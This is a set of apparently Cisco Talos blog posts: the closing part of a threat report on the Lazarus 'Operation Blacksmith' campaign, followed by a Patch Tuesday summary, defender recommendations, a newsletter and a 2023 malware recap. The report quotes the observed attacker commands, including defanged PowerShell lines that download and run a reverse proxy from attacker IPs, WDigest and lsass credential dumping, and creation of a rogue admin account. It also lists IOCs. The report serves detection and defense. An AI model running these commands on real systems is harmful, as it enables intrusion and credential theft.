During our analysis, we found that the session information ID used by DLRAT as part of its communications with its C2 server is “23wfow02rofw391ng23“, which is the same value that we found during our previous research into MagicRAT. In the case of MagicRAT, the value is encoded as an HTML post. But with DLRAT, it's being posted as multipart/form-data. This session information is hardcoded into the DLRAT malware as a base64-encoded string constructed on the process stack during runtime:

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
Hardcoded Session ID in DLRAT, the same as MagicRAT.

The C2 reply only contains the external IP address of the implant. The malware recognizes the following command codes/names sent by the C2 servers to execute corresponding actions on the infected system:

Command name

Capability

deleteme

Delete itself from the system using a BAT file.

download

Download files from a specified remote location.

rename

Rename files on the system.

iamsleep

Instructs the implant to go to sleep for a specified amount of time.

upload

Upload files to C2.

showurls

Empty command (Not implemented yet).

Illustrating operation Blacksmith

This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing servers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant on the infected system. 

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
Typical Infection chain observed in Operation Blacksmith.

Phase 1: Initial reconnaissance by Lazarus

Lazarus’s initial access begins with successful exploitation of CVE-2021-44228, the infamous Log4j vulnerability discovered in 2021. The vulnerability has been extensively exploited by the Lazarus umbrella of APT groups to deploy several pieces of malware and dual-use tools, and to conduct extensive hands-on-keyboard activity.

Command

Intent

cmd.exe /c whoami

System Information Discovery [T1082]

cmd.exe /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:5 /q:*[System [(EventID=25)]] /rd:true /f:text

Query event logs: Get RDP session reconnection information

net user

System Information Discovery [T1082]

cmd.exe /c dir /a c:\users\

System Information Discovery [T1082]

cmd.exe /c netstat -nap tcp

System Information Discovery [T1082]

systeminfo

System Information Discovery [T1082]

cmd.exe /c Reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest

OS Credential Dumping [T1003/005]

cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

OS Credential Dumping [T1003/005]

Modify Registry [T1112]

cmd.exe /c tasklist | findstr Secu

Software Discovery [T1518]

Once the initial reconnaissance has been completed, Lazarus’ operators deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228.

Command

Action

cmd[.]exe /c powershell[.]exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System[.]Net[.]WebClient).DownloadFile('hxxp[://]/inet[.]txt', 'c:\windows\adfs\de\inetmgr[.]exe');

Download and execute HazyLoad

c:\windows\adfs\de\inetmgr[.]exe -i -p

Execute HazyLoad reverse proxy

cmd /C powershell Invoke-WebRequest hxxp[://]/down/bottom[.]gif -OutFile c:\windows\wininet64[.]exe

cmd /C c:\windows\wininet64[.]exe -i -p 443

Download and execute HazyLoad

In certain instances, the operators will also switch HazyLoad over to a new remote IP address. This is a common tactic attackers use to maintain continued access to previously compromised systems as their infrastructure evolves.

Command

Action

cmd /C taskkill /IM wininet64[.]exe /F

Stop original HazyLoad execution

cmd /C c:\windows\wininet64[.]exe -i -p 443

ReLaunch HazyLoad with new parameters

The threat actors also created an additional user account on the system, granting it administrative privileges. Talos documented this TTP earlier this year, but the activity observed previously was meant to create unauthorized user accounts at the domain level. In this campaign, the operators created a local account, which matches the user account documented by Microsoft.

Command

Intent

cmd.exe /c net user krtbgt /add

Account Creation [T1136]

cmd.exe /c net localgroup Administrators krtbgt /add

Account Creation

[T1098]

cmd.exe /c net localgroup Administrators

User Discovery [T1033]

Once the user account was successfully set up, the attackers switched over to it for their hands-on-keyboard activity, which constitutes a deviation from the pattern Cisco Talos previously documented. The hands-on-keyboard activity begins by downloading and using credential dumping utilities such as ProcDump and MimiKatz.

Command

Intent

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Credential harvesting [T1003]

pwdump.exe //Mimikatz

Credential harvesting [T1003]

Phase 2: Lazarus deploys NineRAT

Once the credential dumping is complete, Lazarus deploys a previously unknown RAT we’re calling “NineRAT” on the infected systems. NineRAT was first seen being used in the wild by Lazarus as early as March 2023. NineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT.

Once NineRAT is activated, it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems. Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase.

Commands typically executed by NineRAT include:

Command

Intent

cmd.exe /C ipconfig /all

System Information Discovery [T1082]

cmd.exe /C ver

System Information Discovery [T1082]

cmd.exe /C wmic os get osarchitecture

System Information Discovery [T1082]

cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

Software Discovery [T1518]

cmd.exe /C net group /domain Domain Computers

System Information Discovery [T1082]

cmd.exe /C netstat -nap tcp

System Information Discovery [T1082]

cmd.exe /C whoami

System Information Discovery [T1082]

Coverage

Ways our customers can detect and block this threat are listed below.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

IOCs for this research can also be found at our GitHub repository here.

Hashes

HazyLoad

000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433

ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4

47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30

f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59

5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541

82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f

9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Network IOCs

tech[.]micrsofts[.]com

tech[.]micrsofts[.]tech

27[.]102[.]113[.]93

185[.]29[.]8[.]53

155[.]94[.]208[.]209

162[.]19[.]71[.]175

201[.]77[.]179[.]66

hxxp://27[.]102[.]113[.]93/inet[.]txt

hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif

Microsoft releases lightest Patch Tuesday in three years, no zero-days disclosed

12 December 2023 at 19:45
Microsoft releases lightest Patch Tuesday in three years, no zero-days disclosed

Microsoft’s monthly security update released Tuesday is the company’s lightest in four years, including only 33 vulnerabilities. 

Perhaps more notable is that there are no zero-day vulnerabilities included in December’s Patch Tuesday, a rarity for Microsoft this year. The company’s regular set of advisories has included a vulnerability that’s been actively exploited in the wild in 10 months this year.  

However, there are four critical vulnerabilities that Microsoft released patches, three of which could lead to remote code execution. The remainder of this month’s vulnerabilities are considered “important.” Thirty-three vulnerabilities are the lowest number included in a Patch Tuesday since December 2019.  

Two of the critical vulnerabilities are CVE-2023-35630 and CVE-2023-35641, which exist in the Internet Connection Sharing (ICS) service on certain versions of Windows 10, 11 and Windows Server. An attacker could exploit these vulnerabilities to execute code on the targeted machine by modifying an option -> length field in a DHCPv6 DHCPV6_MESSAGE_INFORMATION_REQUEST input message. However, this attack is limited to systems connected to the same network segment as the attacker. 

Another critical remote code execution vulnerability is CVE-2023-35628, which exists in the Windows MSHTML Platform. The MSHTML platform is used in different web browsers, including Microsoft Edge, and other web applications through its WebBrowser control.  

An adversary could exploit this vulnerability by sending a specially crafted email that triggers automatically when the Microsoft Outlook client retrieves and processes it. This means the vulnerability could be triggered before the user even opens the email in the Preview Pane. Alternatively, an attacker could also put a malicious hyperlink in an email and trick the user into clicking on the link.  

There are also a few vulnerabilities Microsoft considers “important” that Talos would like to highlight because of their specific attack vectors.   

There is an information disclosure vulnerability (CVE-2023-35636) in Microsoft Outlook that could lead to the leaking of NTLM hashes. Attackers commonly use NTLM hashes in follow-on attacks, such as pass-the-hash. An adversary could exploit this vulnerability by tricking the user into opening a specially crafted file, such as a lure document attached to a phishing email, or a file hosted on an attacker-controlled page they trick the user into opening in their web browser. 

Windows Media also contains a remote code execution vulnerability that can be triggered if the user opens a specially crafted file. CVE-2023-21740 is considered “low” complexity by Microsoft, and because it’s in Windows Media Player, a potential attack vector could be ripped movies, episodes of television shows or home videos that could serve as convincing lures for targets.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62762 - 62771, 62786 and 62787. There are also Snort 3 rules 300774, 300777, 300778, 300780, 300781, 300784 and 300787.

Recommendations that defenders can use from Talos’ Year in Review Report

14 December 2023 at 12:21
Recommendations that defenders can use from Talos’ Year in Review Report

The Talos Year in Review is available now and contains a wealth of insights about how the threat landscape has shifted in 2023. With new ransomware strains emerging from leaked source code, commodity loaders adding more reconnaissance measures to their belts, and geopolitical events influencing APT activity, there’s a lot to dissect.

From a defender’s point of view, what does that mean heading into 2024? Do you need to consistently shift tactics too, to stay one threat ahead? 

The thing is, we will never be “done” with cybersecurity. There will always be new threat actor groups. New strains. New tactics. And even if the defender community dismantles a botnet, like for example the takedown of Qakbot in August, it doesn’t mean the group behind it will cease to operate. We’ll never reach that scenario in the game of Battleship when you’ve found the final target and smugly mutter, “This is your last boat.”

There’s two ways of looking at that. You can either say, “What’s the point?” Or “We know we’ll probably get hit at some point. What can we do to ensure we eradicate the threat as quickly as possible?” So much of cybersecurity is about balancing and reducing risk. Knowing what risks you can accept, and what risks you absolutely can’t. 

That base visibility is key. As we at Talos commonly say, whomever knows the network best, owns the network.

For example, Veradigm, a healthcare IT organization that the Cisco Talos Incident Response (Talos IR) team has been working alongside for many years to proactively assess and constantly improve their security posture, recently detected an intrusion and potential information-stealing attack. Luckily, their preparedness coupled with their Talos IR partnership enabled them to swiftly pinpoint the issues before bad actors could execute their plan.

The key to Veradigm’s successful response? Visibility across the network, having a clear plan, and being able to answer these four questions as quickly as possible:

·      How did they get in?

·      Are they still in?

·      What did they do?

·      How could they get in again?

Veradigm has also participated in multiple Talos IR tabletop exercises to stress test processes and adjust as needed to respond and succeed more quickly.

Aligned to that, experts from across Cisco recently sat down to discuss proactive threat hunting in general, and the benefits this type of activity can have to help organizations find vulnerabilities and weak points that hadn't been spotted before. Check out the discussion below:

One of the newer cross-regional trends we observed this year (and wrote about in the 2023 Year in Review) is an increase in the targeting of network devices, from both APTs and cybercriminals. The intent can differ between these disparate adversaries: the former is more driven by espionage and secondary target selection while the latter aims more for financial gain.

Both groups rely on exploiting recently disclosed vulnerabilities as well as weak/default credentials. This is one of the reasons why use of valid accounts was a top MITRE ATT&CK technique observed this year, and consistently a top weakness in Talos Incident Response engagements.

Patching isn't easy, and isn't necessarily without risk. It all comes back to that balance again.

We got a question on the Reddit AMA thread that we ran earlier this week, about the difficulties of patching network infrastructure. I thought my colleague Lexi DiScola's response was such a good one I wanted to highlighted it here.

The question was, "Eventually these [networking] devices may get patched, but not without a significant planned downtime, ranting from org leaders, and/or hesitation from the networking team (if there is one). Especially in larger orgs, where the number of devices may be in the hundreds or thousands. What have you observed to be the biggest barriers to patch management that you see regarding network devices?"

Here was Lexi's answer:

"One of the biggest barriers in securing these devices is that they are often not prioritized by security teams - whether that be for the reasons you listed, and/or because there is a lack of awareness around the significant level of access they can enable. As there is often limited monitoring of these devices, security teams may not even realize they are being leveraged as initial access vectors during large scale intrusions. This lack of awareness is further highlighted by the fact that many of these devices are vulnerable due to organizations using default passwords and configurations, vulnerabilities that are often quickly remediated in other network infrastructure. We recommend organizations improve monitoring and defensive measures for these devices, patch security flaws, remediate insecure default configurations, and improve employee awareness."

In terms of other recommendations based on the trends in the Year in Review Report? Well, if you thought you were about to read a blog about security recommendations without the mention of multi-factor authentication, I’m sorry to break it to you, because that’s about to happen. MFA really is one of the best things you can do to limit your threat surface.

In this episode of the Talos Takes podcast, we address the basics of implementing MFA in any environment, why any type of MFA is better than no MFA, the pitfalls of certain types of authentication, and whether going passwordless is the future. 

Read the full Year in Review below (no form filling necessary!):

Recommendations that defenders can use from Talos’ Year in Review Report

Read the 2023 Cisco Talos Year in Review

Download Now

A personal Year in Review to round out 2023

14 December 2023 at 19:00
A personal Year in Review to round out 2023

As you’ve probably seen by now, Talos released our 2023 Year in Review report last week. It’s an extremely comprehensive look at the top threats, attacker trends and malware families from the past year with never-before-seen Cisco Talos telemetry. 

We have podcasts, long-form videos and even Reddit AMAs to keep you covered and make it easy to digest our major takeaways from the report. Or, just kick back with a cup of coffee and read the full report — your choice! 

With this being the last Threat Source newsletter of the calendar year, I figured I’d do a Year in Review of my own. I don’t have the data or first-hand research to back any of these statements up, this is purely just vibes-based or things I’ve discovered about myself and my cybersecurity habits over the past year, so while you may not be able to deploy any of these things on your firewall, I hope they serve as good advice to anyone thinking about the security landscape heading into the new year. 

  • Do as I say, not as I do. Before my daughter was born, I wrote in this newsletter about how I was skeptical about posting her face online and entering her personal data into various platforms while she’s so young and unable to even understand what a phone is. As soon as she was old enough to smile, I folded quickly. I’ll admit that I’ve posted her face all over Instagram, supplied her information to Gerber to enter her into the annual Gerber Baby competition (she came up short behind Maddie, apparently) and given personal information to who knows what sites while I was randomly trying to get answers to my first-time parent questions at 2 a.m. when she was getting her first tooth. None of these things are particularly smart in the long run, but as an unbiased observer, I can confidently say her cuteness on the internet only makes it a better place. 
  • Just assume your passwords are going to get out there. Several major password management services were hit with data breaches this year. And there were countless headlines about how brute-forcing password guesses led to others. The basic idea of a password manager is that your login information is inherently safer than just using the same password repeatedly, writing them down on a physical sheet of paper, or just hoping you remember each time you log in. At this point, I think it’s just safe to say that passwords are not your safest option. Passkeys and a passwordless approach to security are becoming increasingly popular, so where you can enroll in that, do it. Or if a traditional username and password combination is your only option, change that password as often as you can and make sure you have multi-factor authentication enabled to whatever password management service you use.  
  • It’s time to get off Twitter. Or X, whatever you want to call it. This platform has fully jumped the shark at this point and is rife with misinformation. The company has completely torn down any internal teams it has dedicated to fighting fake news or scams and searching for literally anything will surface misleading information, outright lies or offensive content. I miss the days when I could go to Twitter and search for a topic to get updates on a particular news item. I’m writing this on Dec. 13, and in the “Trending” sidebar on Twitter, I saw that “#cyberattack” was trending. Naturally, I wanted to see if there was an event going on I should be aware of, for obvious reasons. Instead, my results in the “Top” section included some word salad about the Bank of England targeting its own country’s critical infrastructure, a nonsensical clip from commentator Dan Bongino about woke leftists showing a cyber pandemic in a new movie, and a shocking amount of conspiracy theories about said new movie “Leave the World Behind.” It reminds me of the Michael Bluth line from “Arrested Development” when he grabs the bag out of the fridge that says, “Dead Dove DO NOT EAT.” 
  • Don’t ever assume a threat is gone forever. Over the past year, many major threat actors and malware operators that were once thought removed showed they could find a way back. The story of the FBI’s takedown of the Qakbot botnet was a major headline in August, and anyone who read the basic coverage would have thought, “Cool, don’t need to worry about those guys anymore!” However, subsequent research from Talos and other security firms found that remnants of Qakbot are still around, specifically services dedicated to sending spam. Trickbot, a major threat actor known for big game hunting, recently switched up its tactics and is actively targeting organizations in Ukraine, despite its developer being arrested and pleading guilty to several U.S. federal charges. And Emotet, which is known for its various stops-and-starts, is relatively quiet right now but was briefly active again earlier this year. This is not to say that these law enforcement server takedowns and arrests aren’t working — anything we can do to make the bad guys’ lives harder is a win in the end — but it’s continued proof that we can never really count any threat out.  

The one big thing 

Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. Our latest findings indicate a definitive shift in the tactics of the infamous North Korean state-sponsored actor. 

Why do I care? 

This particular activity can be attributed to Andariel, a spinoff of the Lazarus Group. They’re actively exploiting the Log4shell vulnerability in Log4j, which is virtually everywhere. The hope is that most people have patched since the ubiquitous vulnerability was discovered in late 2021, but telemetry indicates there are many vulnerable instances still out there. Once infected, Andariel looks to install other malware loaders on the targeted machines and executes remote code that allows them to learn about the details of the system.  

So now what? 

Talos’ blog outlines the numerous ways Cisco Secure products have protections in place to defend against Operation Blacksmith and other activities from Lazarus Group. 

Top security headlines of the week 

Hundreds of Windows and Linux devices from a range of manufacturers are vulnerable to a newly discovered attack called “LogoFAIL.” The attack involves an adversary executing malicious firmware during the machines’ boot-up sequences, which means it’s difficult for traditional detection methods to block, or for users to even notice that it’s happening. The researchers who discovered this exploit wrote in their full paper that, once the attacker uses LogoFAIL to execute remote code during the Driver Execution Environment phase, it’s “game over for platform security.” Although there is no indication this type of attack has been used in the wild, it is being tracked through several CVEs. Potentially affected users should update to the latest version of UEFI by updating their firmware, including new patches from AMI, Intel, Insyde, Phoenix and Lenovo. Users can also lock down their machine’s EFI System Partition (ESP) so adversaries can’t access it, which is necessary to carry out LogoFAIL. (ArsTechnica, ZDNet

The U.K. publicly charges Russia’s intelligence agency, the FSB, of a yearslong cyber espionage campaign targeting British government officials and other high-profile public citizens. The U.K. Foreign Office said the FSB conducted "sustained unsuccessful attempts to interfere in U.K. political processes” over several years, including stealing information relating to the country’s national elections in 2019. The alleged campaigns involved trying to breach emails belonging to politicians, journalists, activists and academics, and fake social media profiles set up to impersonate the target’s contacts. One MP in British parliament said their emails had been stolen. Several individuals belonging to a group known as Star Blizzard have been sanctioned for their connections to these activities. (BBC, Politico

Several major hardware and software vendors released their last patches of the calendar year this week. Microsoft disclosed four critical vulnerabilities as part of its regular Patch Tuesday, three of which could lead to remote code execution. However, the total number of vulnerabilities included in December’s Patch Tuesday, 33, was the lowest in a single month since December 2019. Meanwhile on Monday, Apple released patches for its major pieces of hardware, disclosing security issues in iPhones, Macs and more. One of the vulnerabilities in macOS, CVE-2023-42914, is a kernel issue with the potential to allow apps to break out of their sandboxes. Additionally, the U.S. Cybersecurity and Infrastructure Security Agency released an advisory that attackers are actively exploiting a vulnerability in Adobe ColdFusion, which potentially poses a threat to government agencies. CVE-2023-26360 is an improper access control issue that could lead to arbitrary code execution. (Dark Reading, Talos, Security Boulevard

Can’t get enough Talos? 

Upcoming events where you can find Talos 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725 
MD5: d47fa115154927113b05bd3c8a308201  
Typical Filename: mssqlsrv.exe 
Claimed Product: N/A   
Detection Name: Trojan.GenericKD.65065311 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: 5a6b089b1d2dd66948f24ed2d9464ce61942c19e98922dd77d36427f6cded634 
MD5: 05436c22388ae10b4023b8b721729a33 
Typical Filename: BossMaster.txt 
Claimed Product: N/A 
Detection Name: PS1.malware.to.talos 

SHA 256: 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa 
MD5: 9403425a34e0c78a919681a09e5c16da 
Typical Filename: vincpsarzh.exe 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::tpd

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

19 December 2023 at 13:00
Year in Malware 2023: Recapping the major cybersecurity stories of the past year

If there is anything the cybersecurity world learned in 2023, it’s that you can never count any bad guy out. 

Botnets kept coming back from the dead, ransomware actors found new ways to make money through data theft extortion and threat actors and malware who have been around for more than a decade find ways to stay relevant. 

Since it seems like there's a new security threat every day making headlines, we like to take a step back at the end of every year to look back at the top stories in cybersecurity that Talos covered this year, including new research from Talos and the stories that were most interesting to readers. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • After Microsoft blocked macros by default in Office documents, attackers needed to find a new file format for their lure documents that could execute malware or malicious code without users noticing. To start off 2023, adversaries shifted toward Shell Link (LNK) files, which provide security researchers the opportunity to capitalize on information that can be provided by LNK metadata. We used this data to uncover new information about the Qakbot botnet and Gamaredon threat actor, and previously unknown connections between multiple threat actors. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Attackers deployed the “MortalKombat” ransomware and Laplas Clipper malware together in a campaign primarily looking to generate revenue by forcing users into paying the requested ransom. The encryption screen and ransom note associated with this campaign used images from the “Mortal Kombat” video game series — hence the name. Our research found these adversaries targeting everyone from individual users to massive organizations. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • The operators behind the Prometei botnet continued to level up their operations, adding new functions and anti-detection methods. Talos reported on what we identified as “version 3” of the botnet in March, including an alternative C2 domain generating algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web shell that’s deployed onto victim hosts. At the time of writing, the botnet had over 10,000 compromised machines. 

  • In other botnet news, the infamous Emotet malware came back online after a relatively quiet period, this time deploying malicious Microsoft Word documents as lures. Emotet is famous for going through brief periods of inactivity, often spanning months, and then re-appearing. Its newest efforts involved infection chains that Talos had not observed the operators using before. 

  • Talos discovers a new threat actor we called “YoroTrooper” targeting government and energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS). YoroTrooper’s activities seem largely centered around trying to steal sensitive information from these groups. We’d continued to follow this group for the remainder of the year, writing about their malware and TTPs multiple times in 2023.  

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Although it was released earlier in the year, Talos disclosed a newly discovered “V2” version of the Typhon Reborn information-stealing malware. The updated version features additional anti-analysis and anti-virtual machine (VM) capabilities to evade detection and make analysis more difficult. At the time, we predicted that Typhon Reborn would appear in future cyber attacks. 

  • A large-scale attack on global network infrastructure known as “Jaguar Tooth” goes public, including extensive reporting from Talos and Cisco. In this campaign, state-sponsored actors targeted older networking devices like wireless routers, including Cisco devices. The UK’s National Cyber Security Centre (NCSC) also released a report on a sustained campaign by a Russian intelligence agency targeting a vulnerability in routers that Cisco had published a patch for in 2017. These ongoing discussions about defending network infrastructure and ensuring organizations use up-to-date devices eventually led to Cisco and other partners co-founding the new Network Resilience Coalition in July. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • A new phishing-as-a-service tool called “Greatness” appears in the wild, offering attackers the ability to pay a subscription fee for their infrastructure. Greatness allows users to send spam emails, pointing targets to convincing Microsoft 365 login pages. The “as-a-service" model for threat actors had long been around, but the trend received increased attention in 2022 as several large ransomware groups shifted to new affiliate models, which offered their services and code to anyone who wanted to use it for a fee. 

  • With the help of our partners at The Citizen Lab, Talos revealed new details about the “ALIEN” and “PREDATOR” mobile spyware suites. Many groups that we called “mercenary spyware” groups use these tools to create spyware, software that is considered illegal in many countries and is often used to target at-risk individuals like politicians and activists. 

  • Talos revealed a new threat actor we called “RA Group” targeting users globally, including companies in manufacturing, wealth management, insurance providers and pharmaceuticals. RA Group uses a modified version of the Babuk ransomware, which was leaked online in September 2021. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Talos discloses the details of a botnet that’s been active for nearly three full years, “Horabot.” The actor delivers a known banking trojan and spam tool onto victim machines, specifically targeting Spanish-speaking users in North and South America. At the time, Talos believed the actor behind this botnet was located in Brazil. 

  • A month after the .zip top-level domain was released for the public to register, our researchers noticed attackers using it in scams designed to get users to leak sensitive information. As a result of user applications increasingly registering “.zip” files as URLs, these filenames may trigger unintended DNS queries or web requests, thereby revealing possibly sensitive or internal company data in a file’s name to any actor monitoring the associated DNS server. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • We discovered multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. Our research indicates that RedDriver has been active since at least 2021. This attack primarily targets Chinese-speaking users, and we suspected the creators of RedDriver are also native Chinese speakers. 

  • An unnamed actor started targeting government agencies in Ukraine and Poland, looking to steal sensitive information and setting up a backdoor for potential future attacks. Ukraine’s Computer Emergency Response Team (CERT-UA) attributed attacks, first spotted in July, to the threat actor group UNC1151, as a part of the GhostWriter operational activities allegedly linked to the Belarusian government. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Talos’ Vulnerability Research team disclosed dozens of vulnerabilities that affect several small and home office (SOHO) routers. That team spent years on this research in the wake of the massive VPNFilter attack. Adversaries could chain together many of these vulnerabilities to directly access or those an adversary could chain together to gain elevated access to the devices. 

  • A new attacker appeared to use a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics. The actor, apparently of Vietnamese origins, was targeting users in targets Bulgaria, China, Vietnam and other countries since at least June. The new wrinkle to this ransomware attack is that the adversary asks the target to download the ransom note via their publicly available GitHub, rather than including some strings in the binary. 

  • The U.S. Department of Health and Human Services (HHS) released a warning to the healthcare industry about Rhysida ransomware activity. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site since then, causing the U.S. government to release a specific warning alerting hospital systems and doctor’s offices about the activity. Talos released several new Snort rules to detect the Rhysida ransomware and details on the actor’s TTPs, including a new ransom note in which they pose as a legitimate cybersecurity company.  

  • Talos discloses new information about the infamous Lazarus Group APT, including several new RATs they’re using in the wild. The North Korean state-sponsored actor targeted internet infrastructure and healthcare entities in Europe and the United States with what we called “QuietRAT.” Additional research into the group found that Lazarus Group is increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.  

  • SapphireStealer, an open-source information stealer, is disclosed after Talos observed the malware across public malware repositories with increasing frequency since its initial public release in December 2022. We assessed with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants. 

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Talos discovered a new malware family we called “HTTPSnoop” being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. We also discovered a sister implant called “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Both tools are believed to be created and owned by the ShroudedSnooper threat actor, which built the intrusion set.  

  • Our researchers spot threat actors abusing Advanced Installer, a legitimate Windows tool used for creating software packages, to drop cryptocurrency-mining malware on infected machines. These attacks specifically target graphic designers or other artists who use computers with exceptionally large graphics cards — thus making them more valuable for cryptocurrency mining.  

Year in Malware 2023: Recapping the major cybersecurity stories of the past year

  • Cloudflare and other internet hosting providers reported what was considered the largest distributed denial-of-service attack ever. Though the actual attack occurred earlier in the year, the official disclosure came in October, including details of a vulnerability in the HTTP/2 protocol that the attackers exploited. Talos released an advisory about these attacks, urging users to patch immediately and releasing new Snort rules to detect the exploitation of CVE-2023-44487. 

  • YoroTrooper, which Talos initially reported on earlier in the year, started using new TTPs, including new obfuscation techniques and the use of commodity malware. The actor is likely operating out of Kazakhstan, but these new tactics were made to look as if their lure documents came from the government of Azerbaijan.  

  • Arid Viper, a threat actor believed to be based out of Gaza, is disclosed. The APT used malicious apps designed as software for the Android operating system to collect sensitive information from targets and deploy additional malware onto infected devices. Although Arid Viper is believed to be based out of Gaza, Cisco Talos has no evidence indicating or refuting that this campaign is related in any way to the Israel-Hamas war, which also began in October. 

